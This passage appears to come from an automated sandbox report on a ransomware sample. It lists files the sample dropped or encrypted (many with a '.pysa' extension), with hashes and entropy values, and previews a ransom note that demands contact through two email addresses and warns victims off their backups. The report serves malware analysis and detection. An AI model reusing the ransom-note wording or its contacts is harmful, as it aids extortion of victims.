                  Encrypted:false
                  SSDEEP:48:n4sskSMIH0pvwxftGNNNmy+H8DpchrDFPy0GK/IOXvDS5Ke4La/6/32umnFqv2Nb:neMIUKfab+wpaDFk5YL6KBq6/RmnFBZN
                  MD5:D522A4159EC056DC10B0999DEA4C1BD0
                  SHA1:624217A52422341FA21A84FC21AF743FEA53559E
                  SHA-256:F22B7A033427A19BF50EB14F279997FD3BDA460B614468B676C30B8EDA234978
                  SHA-512:B6CE3ADAAE872DBA8D6CAFE9B64410A2697090FE7FBCCF09EAD797E9D3A9F70BF9CB0A19EB33C7C103EFC74FB285F5FE37DF1DE0A4D2640D8BD1A18178E7C088
                  Malicious:false
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  C:\ProgramData\SoftwareDistribution\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\USOPrivate\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\USOPrivate\UpdateStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\USOPrivate\UpdateStore\updatestore4df22196-a1f2-426c-aa27-062a9f86aba6.xml.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.788681106808847
                  Encrypted:false
                  SSDEEP:48:3KyIy528jSkRelJWdIVbSeV8OXmgC+n+ZfStm3sqeNczzq5KQ/BIdF7LYNXZTxZ0:awUQePWd4+e1XlSNwc/q0Qm7cvlSWc
                  MD5:9B141CF15F5AFC5F3D89E7B8E7312D4E
                  SHA1:D469A5FD61BC715B3587BD22DB3926F3B43CD13C
                  SHA-256:AC233F7A2D952FB4278587A0BE4160351A596ADDCEF13B62A4B0758143E95ED9
                  SHA-512:308BE01EE5CDE50792AB0E8FAF8DB439E759C5ECDD9383CF178FD1117109BE3AF2B5CAD33ED2DEECFF80C63CAA325BFEB52F8A1319D67D662339079A8EE767D2
                  Malicious:false
                  C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.792475686661291
                  Encrypted:false
                  SSDEEP:96:FgrXp124C3jKjQ8oP9/a3X5a2b39VtJnmHt3qK7:Ap124gK+P99E9VTwp
                  MD5:506384AAA6902DC517966D7324DD18DD
                  SHA1:4DE306A782493F7D452F276CCC7F61DC8F6EEF1E
                  SHA-256:4E0DD5397EBBD25D26CAA24A356A28040507049D15FD826EA8886E819529E48C
                  SHA-512:8C5C2BCF97DE69909F5C5D725EBA7C7301DBC901003FE1E49C87561BB4A3D55C9D3160DA947E8C760E2CA83387CAF01E6D1D4C0AB3E1A3061B9470C04ACCC6BB
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\NotifyIcon.001.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.675287621696691
                  Encrypted:false
                  SSDEEP:192:w6EH8qVXMTHRtDiKalHw6V22eJb1FmjRk3XzLZ6sUIKjsHfqymr:TE2TxEDBw6VuJbTm1dsUBjUqPr
                  MD5:DAB4D058F1FC78E9E617D68D158888DC
                  SHA1:8F6D9A45694E240F922DE97DB2CBCCA5B663B187
                  SHA-256:7C9F4BDDF88305D5BC3B54783C6DF3387F3F7DAD285E882C7DED367486F89780
                  SHA-512:6DEA4BFE2F9B988B74CD3A6162004EBE58A3C9716479996834C8590FA198117A6153CA49A24A24200FA8A1963A451CBCC833A2602B0F09B31E2E4F99F6EFAE19
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\NotifyIcon_Temp.1.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.679625085630809
                  Encrypted:false
                  SSDEEP:192:G0r06kRLbYeI0dByaLGobPdyCFlIM7ff0Yg9BwTkLqkaMG:RrJkmeI0dcAGmzDf0Y4KkLo3
                  MD5:014160163B1EC283E7B7FCFF6021E251
                  SHA1:CA40A1593E318B5B0EBEC1F3057745DA2FE312CB
                  SHA-256:C4F55732A399EC3F53BCE461C65F618DB97C34B2DF1C5752F6586BD0AC3B7A5F
                  SHA-512:1B1B13B90E191E4BF13A22B104ED772B5EB4F101DE632EDC4C20277563A0EEDD553AD906F079ECBC7290A62B89196F748EA5133F34B92BD21D010B20B0702BF2
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.91980606646942
                  Encrypted:false
                  SSDEEP:384:KH/5u9uxyH1aLAPlfPDhw5JGHLE6JYE6JKafhVtGwndA7Tf:qBY/GAt3Dhwig06waflGwndwf
                  MD5:DD9307DC182597AB498901C1B8170A58
                  SHA1:F2F0526305D7F2F1283EF58DDFD3E3B866930657
                  SHA-256:9FB4E7DFE0690DDC18EC15219E8D605CE331B77E376B9593A7692FD479C927FA
                  SHA-512:4EF47F0E9B2225DFF3DBEC87B7718ABF627D15C391FEE4A3581C7F0BBEE28A10678406EF2E49F2BD8803F51A1ACD236FF720E1A7D7847D66374167BFE9233AF7
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.002.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671570386034094
                  Encrypted:false
                  SSDEEP:192:WHWQdiK/7W1ITgBMFZ+yDtrHcEcnc+vdb1cSWmMGz3:sWY/7W1ITWMFRtLLp+vimRz3
                  MD5:02BD6FC7816285C6FBBC2E29200F499A
                  SHA1:F62720EF8C9EA26B7CC37E8340609C273CA962B0
                  SHA-256:A9A4A149530DD64C796D1B5C8CE2E33EB960FCEFBD3B1539DFA8BB464ECF78CF
                  SHA-512:CA38F1B0AB10188280F2FD8890C3250ECE1D1D273349812FCC6125E3E094759C6714DDB1B740DF711327953770FB3A0148C65F47955DDF8250C4E25D7DB6DA24
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.003.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.135505701498303
                  Encrypted:false
                  SSDEEP:96:eg8xBGtJVNFp4wbZ5r6QP0FO1qrvtVIFK051BKR2+gE6B99rX:Bg2p4wr1kOkrvtVI872
                  MD5:7D8D529967EEF95F1DA5D6B7ED13C9AA
                  SHA1:6EE07E6895B3BB1751225F180F647FBB2C2444F5
                  SHA-256:3B02A024C683D73BCD244F3A217650B6F18E50AC93BA5F3BB18E194FF9C4DFA3
                  SHA-512:7E052EBAA180F3D0A618A986CB313BEC06E921DEA55F9D83DBE189B1703B7101293C4D5FFAE0562CEC939308C082D5F51B896C275C50EEC7F5030BBA2CCF86AF
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.004.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.150274417956063
                  Encrypted:false
                  SSDEEP:96:9xM1wnkwHzbi7vGT2tE699TdDNaQ0bLFtQGO262XrpAJOymUz/t35ba:Y1sBi7vGTEE69Vdzav6tmUz1Za
                  MD5:CDF4E269B285ECE2B78F0B31256B55B4
                  SHA1:E200BFD6130C20E8D7947F61AAB2F84016265B39
                  SHA-256:F982CDDAECD9FEA5E8677EDE86A51A355613A485AC7160BD3D513789C710A4C7
                  SHA-512:629A3262FA77D52ECF7680E92F9EA5C3486A44D5B4CA1840B16D7EB29C5552312A399872658D532F4716A961A3E0356E3612B823D98BF37C909F07C2EEAB19F2
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.005.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.920979450538144
                  Encrypted:false
                  SSDEEP:384:U8yi2tDSzrx54MqZ0DUNRv0Ttj4R/zxBNJJnYdimwQ/YsCDPGBUDKK7maWjH4CNP:aiUm/x54MqNZOaZxBNTnHw/YsCDPGBMs
                  MD5:945ED615C1E7DAF61C726991176D6B2D
                  SHA1:FCD838EB2A6A7614D6195176F7513F7DB8539C46
                  SHA-256:F938F0A2EEE0ADCA6B74B88D122D67F7D1114406E3198F87C1FB2DF91AA3AA28
                  SHA-512:73ECF2A75267F3D8BCE7760FA7367B5BF00B9BABFB7E7C3EBE46827E77F22CEAB24630F2D3427CE46102D127E31F7DE337B55B860A493FDAAB54ABA19907433B
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.006.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.1708977650959564
                  Encrypted:false
                  SSDEEP:96:vawWnd0GJs0uXMsuK4197HEwNDuhktraFuikRVn+Kl5t+JZa:vald7JFwMsM197HNVuhcraFu+KJ+JZa
                  MD5:9C0383B086B92C59AB1E6E486A289D99
                  SHA1:3634B24CACC4EFA64FE363E309FB09B5EE256414
                  SHA-256:B70C76C906F927F0CA012384CC77D16B97EA47F0C20C05DBC2CED10C566DC077
                  SHA-512:32152BCA1669B6F24F0DEEEF113C34FE19A2B5C1E453CB92C1C38517FAFFCAA5F1D26DD7F3FBC8DE366ECC37D5CCBC9100BE127FE99049BA615CCF6BC154B366
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.13649858762453
                  Encrypted:false
                  SSDEEP:96:bTmjGWJKUncsnEILLpzdRP1DAt8pUy2ADTUJ1HBP1OXNx/nDmX+IkGt7ptuzNiwO:vmxjncsttzvyt8pv2Z1HB9OXNxfJfGFD
                  MD5:7BAB1B164F2AD569A1512E6BB7D4E4F4
                  SHA1:D47CEC527DD47241F3995CC92BDBFF314EE51084
                  SHA-256:ABE135A4036099B7A6839A86DDE006319BBDBB758C85AB906ECCE0B4F622A410
                  SHA-512:4E1651AC5B599F8D857B5F37E8B73D2731065D9F023B18E6A484DEE357B6D64F3C285129DBA301D7A008402836720B1A72750C57F661E7F28FFFE479550866A7
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.117701260310343
                  Encrypted:false
                  SSDEEP:96:q3ZpXMev3pZrru1YuQIMoD9wLzVcGWJj2l6tuA856WDle2uqiFH0fyLh:qXvRZnxVCwE2lc4duqiFKGh
                  MD5:EBCC368FEBB1A88E49AE83F26D50A8D7
                  SHA1:F7A1B514FA2A3B2B166F46ABD8EE7B17053F0E7F
                  SHA-256:933ED78B444170EBFC1430B34B5C9CD3CA715A0951F80A83ACA480F2BD6201A3
                  SHA-512:22715CA580CD6F2F8ACE7C68E9CC3C55173067E72E6B11EB2846872D002785F350BF4177409D76C854D6ADE31B36B9803715BDA4D2183064CB55A274E078DF56
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.009.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.158525738456052
                  Encrypted:false
                  SSDEEP:96:d6z5i7EowQ2aIvfAe4DJ/1F4i+9TQsG6IcUIKne4a4w2q6YM6bI/AJp06Guwzggr:8iLwQ2fnJ4DJ/4tQ56ce4a4OS/oz0nP1
                  MD5:04E4AB31BC18DD717630E548766C2955
                  SHA1:56689C507D82CD7B37FECE85A7B3CDF29B157D6A
                  SHA-256:1927E5C6DB140EFC1D212CE9B8CAA30CCA1B62CF438B323A5F20DC222BBEB4DA
                  SHA-512:E3B86357DBDD5FA1A36545CB4891AC8D5077C5CB122C820A1EA38584AAE38DA62004B744CF65F2BA7EAD27D4AB7B8F4EA1B631F26D715EF4D6499528D6A45D1A
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.010.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.151196510050001
                  Encrypted:false
                  SSDEEP:96:9lOW1/3L5aOdQ5PFD6SNT2CBMaV/zmSaksRFS0OIN1Df7gQqB8pW4sl:DvQPltNT2ClRmAsRFSoN1D0QqF
                  MD5:4B433EADA384EAB34675FA1F7B8E49BF
                  SHA1:3E0B9B455F4152B8230A204F5DEBADB93526C7F0
                  SHA-256:347DD1E309E430B2008F76F876955A26876382B71EB93B2FF272A5E59D5D6D67
                  SHA-512:9E3E76CBD38E9781E6D13854ECDA2A041AF05ADE211268D001B2FE23606ADF940E02A67E1FD4894BCB1E74A53E2079261174E3E845088CE27F5C917D34F65A00
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.011.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.133692727219115
                  Encrypted:false
                  SSDEEP:96:8f3ZQqX3cBGyUZzgqK8Bw/+rlXoX+P/FTXt02ulYVXKlrGJNFY1j1G:S3xXOGymgqKwwolYXs+RUsG
                  MD5:9AEE3454DBF3F6141BB124828A1ED5AC
                  SHA1:183D45A0FB46E426AD87CA82B68A4C7FD1AB3D00
                  SHA-256:83C1BBBDEFC004B9374DB3701F92EB8D14260BA34A348F8060CE0C9944887BEB
                  SHA-512:FD252ACA64B7A1B9A760FEDA39E4ED3B0318892711EDEC0D5CFE1EF9B56587B1C9AEB8B3F1D6B1CC6B65AB3359A1FED4786E15C117D1BB92BA43106B5F852F86
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.012.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.144952261967
                  Encrypted:false
                  SSDEEP:96:b6AdSz5aBXJZ6C62Axrgw3SuFHhrrfZaLqEFv9uRKMAXDHte:b67oJZ66WgZu7rZa20v9AA8
                  MD5:4ADF750805D6FFC06653D205B17EFC76
                  SHA1:843BF0E0864F77F1E9C4BD3791841749D9428B2E
                  SHA-256:BA00432548C4196E83B1A0093DDD2DF93B6DBD807A317BFB39B40E8FA38BDF86
                  SHA-512:F03F096FAAB82CCAEB30F53E0359D87C7B5A5464F4CA95C36CB473038CFF9C4E218446246805F38704A1A6212E89940E3D20607D5C7EED8EB60C4233A7C762BF
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.013.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.684333435208918
                  Encrypted:false
                  SSDEEP:192:VRYMnV4ZnGVcmEb5IrhnWa9Kl1FhDVi+hsFFDUxqV:VmaV4PmEKQH/xFeFDLV
                  MD5:872E0C0DB7D8C9AD75F88D3D3E8D242F
                  SHA1:B3B08C87563DC30F77FAD9C1AA58B2472FB5F213
                  SHA-256:D46779D63B5BB3E7B64206CE802BCE586CC50A671FD6FA2F791707FFBE2924E4
                  SHA-512:805D2C2D964E0CDA9732CD0BFD0FDC3853FF1764E0393FEC87D3746DA1737F3D275F397A28C4CB39098141E953B45117631533EDCBC9318ED7990F9F5ACE2A2F
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.969238886060302
                  Encrypted:false
                  SSDEEP:768:A5ogolQsovdRSciYUWwhqgpyLOyb1CFY05qK108uyhjrLp+IWagoRCbl4Itt:A5ofQsvi6gZXbIY0548uypZ+ygoQbOIn
                  MD5:720F8BD462658070E79C8A3D23AC8FA5
                  SHA1:F496F5FB3A6C704B456B51A440F7A20BA096750C
                  SHA-256:3C269E68CC3682CE1EEA850603BC36E4200019D387AF557EB9B4F6EB233EC2A1
                  SHA-512:626D486EAF9E0E1EF3413D040F305F259AAE35CE0E8EA003ACA72FC230E41F661B8F8AAC16983FEFD34F12CF976B455414A416E312400298A66C425498545DAD
                  Malicious:false
                  C:\ProgramData\USOShared\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\WindowsHolographicDevices\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\dbg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  C:\ProgramData\regid.1991-06.com.microsoft\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.056905560730258
                  Encrypted:false
                  SSDEEP:48:XqCjm0Cc7SdSAuD1AZ3YB7SmfoQF95gZcN2jZOpYQhHJ0nbUqY9a4NKMiZ7U:XqC6/vuDqZo5RF9yKIwppp0bUF9amKZg
                  MD5:C9512A2D9E8578D27DEEEC3DD5B57329
                  SHA1:044436EAE6D83EE9D9C49D0F15B806E1752D89FD
                  SHA-256:88398ACB0174C794F7F4C9BF923DF2087EE7EE0865774F96F90BB2C5AE0F7CA6
                  SHA-512:D209C9029A7703C16A272B8DEE79DB78FD1BCF47F6188AEF4F97A11B025EEAB00AB78CECA6E186D9499B8C40E1821C5BA7153875CA66AC1A8C8B7D8FBA3D09A0
                  Malicious:false
                  C:\Users\Default\AppData\Local\Microsoft\Windows\History\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):24518
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEF:h
                  MD5:F98E93D8471143387B95AEF89981C405
                  SHA1:1EBD38B94C8E4B24CF88F75A0AC821AB0D07AAFE
                  SHA-256:E4FD223F6241265E323D0ADA868CAB82EC17C40C10F0E1386FD6BCE5EF441CA8
                  SHA-512:5D1A7768A3C1067A4452BABE52EDA4B1B87090B57B7F88B846E7499A8F709C80EEA0309BDB835EF4F5839121E246B38EEEA749E2AF19B2FF8B80F69AD7F2B54C
                  Malicious:false
                  C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\Readme.README
